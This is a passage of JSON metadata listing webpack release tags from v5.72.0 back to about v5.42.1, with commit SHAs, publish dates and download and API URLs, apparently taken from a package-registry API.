ests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","publis